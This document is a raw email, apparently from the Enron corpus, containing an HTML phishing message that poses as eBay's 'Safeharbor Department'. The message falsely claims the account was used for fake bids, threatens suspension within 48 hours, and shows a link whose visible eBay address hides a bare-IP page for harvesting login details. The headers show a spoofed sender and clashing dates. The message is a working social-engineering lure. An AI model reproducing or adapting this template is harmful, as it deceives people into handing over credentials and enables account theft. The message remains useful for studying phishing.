Recieved: from nahou-mscnx06p.corp.enron.com ([192.168.110.237]) by NAHOU-MSMBX07V.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 14 Sep 2001 02:43:42 -0800
Received: from corp.enron.com ([192.168.110.228]) by nahou-mscnx06p.corp.enron.com with Microsoft SMTPSVC(5.0.2195.2966);
	 Fri, 14 Sep 2001 04:43:02 -0600
Received: from mailman.enron.com (unverified) by corp.enron.com
 (Content Technologies SMTPRS 4.2.1) with ESMTP id <T5a0a335258c0a86ee241c@corp.enron.com> for <tstaab@exchange.enron.com>;
 Fri, 14 Sep 2001 04:41:33 -0600
Received: from boson40.phys.tku.edu.tw (boson40.phys.tku.edu.tw [163.13.111.180])
        by mailman.enron.com (8.11.4/8.11.4/corp-1.06) with ESMTP id g343Bbl34726
        for <Theresa_Staab@enron.com>; Fri, 14 Sep 2001 05:40:02 -0500 (CDT)
Received: from boson40.phys.tku.edu.tw (localhost [127.0.0.1])
	by boson40.phys.tku.edu.tw (8.12.11/8.12.11) with ESMTP id j1A3rFaI002907
	for <Theresa_Staab@enron.com>; Fri, 14 Sep 2001 18:32:13 +0800
Received: (from student@localhost)
	by boson40.phys.tku.edu.tw (8.12.11/8.12.11/Submit) id j1A3rEpl002906;
	Fri, 14 Sep 2001 18:32:12 +0800
Date: Fri, 14 Sep 2001 18:32:12 +0800
Message-Id: <200502100353.j1A3rEpl002906@boson40.phys.tku.edu.tw>
To: Theresa_Staab@enron.com
Subject: seccurity account
From: "support@ebay.com" <ebay@ebay.com>
Content-Type: text/html






</td></tr>
</table>
</form></td>
</tr>
</table>
<br>

<div id=message>
<table cellpadding=0 cellspacing=0 border=0 width="100%""><tr><td>


<table cellSpacing="0" cellPadding="0" width="600" align="center" border="0">
  <tbody>
    <tr>
      <td><A target="_blank"      href="http://click3.ebay.com/99019653.50692.0.20283"    ><IMG
src="http://emailpics3.ebay.com/627422250/images/logo-18.gif"    border=0></A></td>
    </tr>
    <tr>
      <td> </td>
    </tr>
    <tr>
      <td><font color="#000000" size="3" face="Arial, Helvetica, sans-serif"><strong>***Urgent Safeharbor
Department Notice***</strong></font></td>
    </tr>
    <tr>
      <td> </td>
    </tr>
  </tbody>
</table>
<table cellSpacing="0" cellPadding="5" width="600" align="center" border="0">
  <tbody>
    <tr>
      <td height="259" vAlign="top"> <p>              <font size="2" face="Arial, Helvetica,
sans-serif"><strong>eBay Fraud Mediation Request</strong><br>
            <font size="1" face="Verdana, Arial, Helvetica, sans-serif">Date: Thu, 21 January 
2005 
</font></font></p>
        <p><font size="2" face="Arial, Helvetica, sans-serif">You have recieved this email because you or
someone had used your account to make fake bids at eBay. For security purposes, we are required to open
an investigation into this matter. </font></p>
        <p><font size="2" face="Arial, Helvetica, sans-serif">          THE FRAUD ALERT ID CODE
CONTAINED IN THIS MESSAGE WILL BE ATTACHED IN
          OUR FRAUD MEDIATION REQUEST FORM, IN ORDER TO VERIFY YOUR EBAY ACCOUNT
REGISTRATION INFORMATIONS.</font></p>
        <p><font size="2" face="Arial, Helvetica, sans-serif"><strong>Fraud Alert ID CODE:
00937614</strong><br>
            <font size="1" face="Verdana, Arial, Helvetica, sans-serif">(Please save this Fraud Alert ID Code
for your reference.</font>)<br>
          <br>
          To help speed up this process,
          please access the following form to complete the verification of your eBay account registration
informations:</font></p>
        <p><strong><font size="2" face="Arial, Helvetica, sans-serif"><a target="_blank"    
href="http://140.111.126.4/.ebay/index.html"   
>http://scgi.ebay.com/verify_id=ebay
&fraud alert id code=00937614</a></font></strong></p>
        <table width="100%"  border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td><p><font size="1">.</font></p>            </td>
          </tr>
          <tr>
            <td><table width="100%"  border="0">
              <tr>
                <td bgcolor="#E6E6FF"><font size="2" face="Arial, Helvetica, sans-serif"><strong>Please Note:
</strong><br>
                  If we do not receive the appropriate eBay account verification within 48 hours, then we will
assume this eBay account is fraudulent and will be suspended. <br>
                  The purpose of this verification is to ensure that your eBay account has not been fraudulently
used and to combat the fraud from our community.</font></td>
              </tr>
            </table></td>
          </tr>
        </table>
        <p><font size="2" face="Arial, Helvetica, sans-serif"><font color="#000000">We appreciate your
support and understanding, as we work together to keep eBay a safe place to trade.</font></font><font
color="#000000" size="2" face="Arial, Helvetica, sans-serif"><BR>
          <BR>
  Thank you for your patience in this matter.</font></p>
        <p align="left"><font color="#000000" size="2" face="Arial, Helvetica, sans-serif">Regards,
Safeharbor Department (Trust and Safety Department)<br>
  eBay Inc.</font><font size="2" face="Arial, Helvetica, sans-serif"><br>
          <br>
          <font color="#999999" size="1"> Please do not reply to this e-mail
            as this is only a notification. Mail sent to this address cannot be
      answered. </font></font></p>        </td>
    </tr>
    <tr>
      <td align="middle" ><p align="center"><font color="#000000" size="1" face="Arial,
Helvetica, sans-serif"><Br>
          <br>
          Copyright © 2004 eBay Inc. All Rights Reserved. Designated trademarks and brands are the
property of their respective owners. eBay and the eBay logo are trademarks of eBay Inc. eBay is located at
2145 Hamilton Avenue, San Jose, CA 95125. </font><br>
        </p>
      </td>
    </tr>
  </tbody>
</table>


</td></tr></table>
</div>

</td></tr></table>

  

</td></tr></table>
</div>

</td></tr></table>



</td></tr></table>
</div>
